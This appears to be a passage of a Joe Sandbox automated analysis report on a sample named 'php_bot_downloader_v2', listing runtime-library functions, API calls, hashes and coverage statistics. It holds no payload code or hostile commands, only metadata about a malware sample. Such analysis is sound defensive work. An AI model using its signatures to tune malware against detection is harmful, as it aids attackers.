                                                • Instruction Fuzzy Hash: B891B173A087A28AE751DB74D8402AC77B0FB44788F184129EE8DA7B65DF3CE995C704
                                                Function 00007FF658E311AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 3544855599-2084237596
                                                • Opcode ID: f4444d037b1fb689084b3d10cb9da7450b886d7a58eb8ba5ff558f001752dc68
                                                • Instruction ID: b2edae5a1f290782e8044e4ac658e96312c68c5f15e0a5856f7ed08192d1f618
                                                • Opcode Fuzzy Hash: f4444d037b1fb689084b3d10cb9da7450b886d7a58eb8ba5ff558f001752dc68
                                                • Instruction Fuzzy Hash: D6514C32A08B558AE7209F65D8403AD77B0F744B88F184129EF4DA3F69DF78E955C704
                                                Function 00007FF658E31938 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 3896166516-3733052814
                                                • Opcode ID: 1231e3bd0bbc00f4bab183a5bb9aa44d8e00dd2da21d4a5fc5b7d713ce3abe7b
                                                • Instruction ID: 7c34db624e4730e1e24fb2d4eed95ad9807ff336059f132ef51825347398c65a
                                                • Opcode Fuzzy Hash: 1231e3bd0bbc00f4bab183a5bb9aa44d8e00dd2da21d4a5fc5b7d713ce3abe7b
                                                • Instruction Fuzzy Hash: 48517032908652C6EB249B31984437876B4FB54B85F1C9139EA8DA7FA5CF3CFC508709
                                                Function 00007FF658E47010 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                                • String ID:
                                                • API String ID: 72036449-0
                                                • Opcode ID: d7766dfd87ad9cc2ea68eb1762deb8f7c0ff0de4b08703f79d2ff84f51fcf0b1
                                                • Instruction ID: 3d67f7bf99b0e970d46afb079eecf9097c710debb81e4a04ec0b90fa81121683
                                                • Opcode Fuzzy Hash: d7766dfd87ad9cc2ea68eb1762deb8f7c0ff0de4b08703f79d2ff84f51fcf0b1
                                                • Instruction Fuzzy Hash: 6851C132E0D26A46F73949389C0537A66A09B81714F1D4435DA8EE6FF6CF7CEC4096C9
                                                Function 00007FF658E23B10 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$AllocateMax_valueMin_valueallocatorchar_traits
                                                • String ID:
                                                • API String ID: 1138929436-0
                                                • Opcode ID: 7122be0a635e2ce142a1961118c1f375f835ba666873dd87a5fbbad60312d432
                                                • Instruction ID: 9ded1d99057df9ca36c07f91b0a263def9db5632a8bb5a7133567c2d79acc3d8
                                                • Opcode Fuzzy Hash: 7122be0a635e2ce142a1961118c1f375f835ba666873dd87a5fbbad60312d432
                                                • Instruction Fuzzy Hash: 0141EC2261DB9581DA60DB66F89126BA7B0FBC9BC4F140125FACE93F29DF3CC5508B44
                                                Function 00007FF658E21950 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E21996
                                                • WideCharToMultiByte.KERNEL32 ref: 00007FF658E219CD
                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E219FB
                                                • WideCharToMultiByte.KERNEL32 ref: 00007FF658E21A33
                                                  • Part of subcall function 00007FF658E23920: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E23934
                                                  • Part of subcall function 00007FF658E24EC0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF658E24EDB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 1905860291-0
                                                • Opcode ID: 91c885f1ed7c398c143790881fd7269a35970c0f20e153e479f042c199767ddd
                                                • Instruction ID: dae29ac0aadcc9d89159339ad3682d3e1a60e4d5cab3ac3d14777b8333730b12
                                                • Opcode Fuzzy Hash: 91c885f1ed7c398c143790881fd7269a35970c0f20e153e479f042c199767ddd
                                                • Instruction Fuzzy Hash: 0431D232608B8186E760DB61F89136AB7B1FBCA790F144025EACE97F69CF7DD4448B40
                                                Function 00007FF658E31B70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: __except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 1467352782-3733052814
                                                • Opcode ID: 404a9135640a8f7f54d37a04beb7c3e6f233d7359f0259a9d02a603aba63125e
                                                • Instruction ID: c418a444317cfa419807d8955dc83894f0be3a78bdb4263e8cdb19d93b24828e
                                                • Opcode Fuzzy Hash: 404a9135640a8f7f54d37a04beb7c3e6f233d7359f0259a9d02a603aba63125e
                                                • Instruction Fuzzy Hash: 8E71B032A086A186D7619B35D8507787BB0EB41B85F188139EE8DA7EA5CF3CED51C708
                                                Function 00007FF658E321A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 2558813199-1018135373
                                                • Opcode ID: 1c721bbbd8e777f36c6cc2bd9560ee61d12da688ad8cdf309b9f1736de0cb18d
                                                • Instruction ID: bad8b48d99603d2ebfd2e409f7906cdeb563f0b7426deb7aad86acae0a84c6c6
                                                • Opcode Fuzzy Hash: 1c721bbbd8e777f36c6cc2bd9560ee61d12da688ad8cdf309b9f1736de0cb18d
                                                • Instruction Fuzzy Hash: 7F514E3261875286D630AB25E44166E77B4FB89B91F180134EF8DA7F95CF3CE860CB08
                                                Function 00007FF658E3DB70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a0f11becec26ba6bae5434212c82596bc3616d2c9da31df36dc0d9d8acdd98d0
                                                • Instruction ID: e7effa1ed33e2029b468204aa62b48fab4ad06fe5f7d343be8fef0a94fd317bb
                                                • Opcode Fuzzy Hash: a0f11becec26ba6bae5434212c82596bc3616d2c9da31df36dc0d9d8acdd98d0
                                                • Instruction Fuzzy Hash: 1D41A262B28A5592EB109F25E8443BA67A0FB847D4F584031EE4ED7B54DF7CE841C744
                                                Function 00007FF658E27340 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: char_traitscodecvt
                                                • String ID:
                                                • API String ID: 1910604377-3916222277
                                                • Opcode ID: 2dd3740d5249f2c62e4c90f57524142d6cc40dfa49b5c8a418a949c9a5b698f7
                                                • Instruction ID: fb5a607126b0025f1c457294a743d96e68acb25c3d8616409cb4316059a30db8
                                                • Opcode Fuzzy Hash: 2dd3740d5249f2c62e4c90f57524142d6cc40dfa49b5c8a418a949c9a5b698f7
                                                • Instruction Fuzzy Hash: 50413D3661C79685EB60DB65E8403AABBB0FB85780F541036EACE97BA5DF3CD404CB05
                                                Function 00007FF658E41564 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _handle_errorf
                                                • String ID: "$powf
                                                • API String ID: 2315412904-603753351
                                                • Opcode ID: 94346845e00dcb021cfd9d151cd7c1a9e33051b68457ee6bae33f092f3bb43df
                                                • Instruction ID: 652e5b4706f44f077bb3a7f58ca23e28fbd4b4c18e4162de5a9ea3c959a859d9
                                                • Opcode Fuzzy Hash: 94346845e00dcb021cfd9d151cd7c1a9e33051b68457ee6bae33f092f3bb43df
                                                • Instruction Fuzzy Hash: 6B414E739286809BD770CF22E4847AAB6B0F7D9348F141325F78952DA8DF7DC5509B44
                                                Function 00007FF658E41440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _handle_error
                                                • String ID: "$pow
                                                • API String ID: 1757819995-713443511
                                                • Opcode ID: 18bb7e5ff252db6465d734b38d379b2326193d5b75f0119f085d7f01c8dee49a
                                                • Instruction ID: c388257d8c2726bb283a27f8a78b44a5f814d64699e5de1152fdf58f6a70fe35
                                                • Opcode Fuzzy Hash: 18bb7e5ff252db6465d734b38d379b2326193d5b75f0119f085d7f01c8dee49a
                                                • Instruction Fuzzy Hash: F9317E72D1CA8586DB70CF20E44076ABAB0FBDA344F241325F2CA56E68CFBCD1859B04
                                                Function 00007FF658E3C964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 40f5e49a73b40da07dda49c01dbf914b70ab7ba69007a2c058d022de3b93caf6
                                                • Instruction ID: 18d4597b900ef060483f7a8c586c8ffe6f6050b922ef004c061191aeaf4f7ac3
                                                • Opcode Fuzzy Hash: 40f5e49a73b40da07dda49c01dbf914b70ab7ba69007a2c058d022de3b93caf6
                                                • Instruction Fuzzy Hash: 99112C32608B9186D760CB56B4402AAB7A4FBC9B94F184136EACDA3B29CF3CD4418B44
                                                Function 00007FF658E2E950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF658E2DB3F), ref: 00007FF658E2E994
                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF658E2DB3F), ref: 00007FF658E2E9DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 83a53ae3cd862f171245188b4110203019df74db5151c77d8265a2f12c31ea52
                                                • Instruction ID: 5a040cec4db218d7ec2e9353db8418854d718842f330b4543e2001c3d3a96ee5
                                                • Opcode Fuzzy Hash: 83a53ae3cd862f171245188b4110203019df74db5151c77d8265a2f12c31ea52
                                                • Instruction Fuzzy Hash: FD116D32608B5682EB508F25E800269B7B0FB88B84F1C4231DECE57B69DF3DD451CB04
                                                Function 00007FF658E3C7D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: DefaultUsertry_get_function
                                                • String ID: GetUserDefaultLocaleName
                                                • API String ID: 3217810228-151340334
                                                • Opcode ID: 7293fa983b561e1e071c1a512e3bae233e7d67415cb892b555dc4b5711bc101c
                                                • Instruction ID: c7ff890392c62ce6f0e73ac1580ff1827bab03e2f6e32933ffb4a86f7315f79f
                                                • Opcode Fuzzy Hash: 7293fa983b561e1e071c1a512e3bae233e7d67415cb892b555dc4b5711bc101c
                                                • Instruction Fuzzy Hash: ECF05E51F0879292FB149B76F6405B922B1AF88780F9C4035D90DA6E65CE3CFD45C348
                                                Function 00007FF658E3C838 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3C869
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF658E3D32A,?,?,?,00007FF658E3D222,?,?,?,00007FF658E35D0D), ref: 00007FF658E3C883
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 02f47dab28cc1ee76c1820b5ee4f0c086afb345b0d24a7a50c2fa0fc933033c0
                                                • Instruction ID: f5fd465ddee94f5e29556b5f5fb77d30011b2597b8acdeb7c5da5ca897d07b67
                                                • Opcode Fuzzy Hash: 02f47dab28cc1ee76c1820b5ee4f0c086afb345b0d24a7a50c2fa0fc933033c0
                                                • Instruction Fuzzy Hash: 83F03A22E0876181EB049BB1B5404A92231AF88B80F9C5435DA5D73F65CE3CE9558748
                                                Function 00007FF658E3C6FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3C725
                                                • TlsSetValue.KERNEL32(?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D,?,?,?,?,00007FF658E3C1F1), ref: 00007FF658E3C73C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: d39b02e3ad21c7a7da89b39418bbdd8ef63acd5140413a85500780d64ec3081d
                                                • Instruction ID: b2d8cf033609d1464dee9bfa33c561a7dcac301da89c1624f2c0e910e53b04c3
                                                • Opcode Fuzzy Hash: d39b02e3ad21c7a7da89b39418bbdd8ef63acd5140413a85500780d64ec3081d
                                                • Instruction Fuzzy Hash: 72E06D62A0871291FA084B71F8000B92232BFC8780F9C4036DA5DB6EA6CF3CFC94C308

                                                Execution Graph

                                                Execution Coverage:1.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:3.8%
                                                Total number of Nodes:681
                                                Total number of Limit Nodes:76
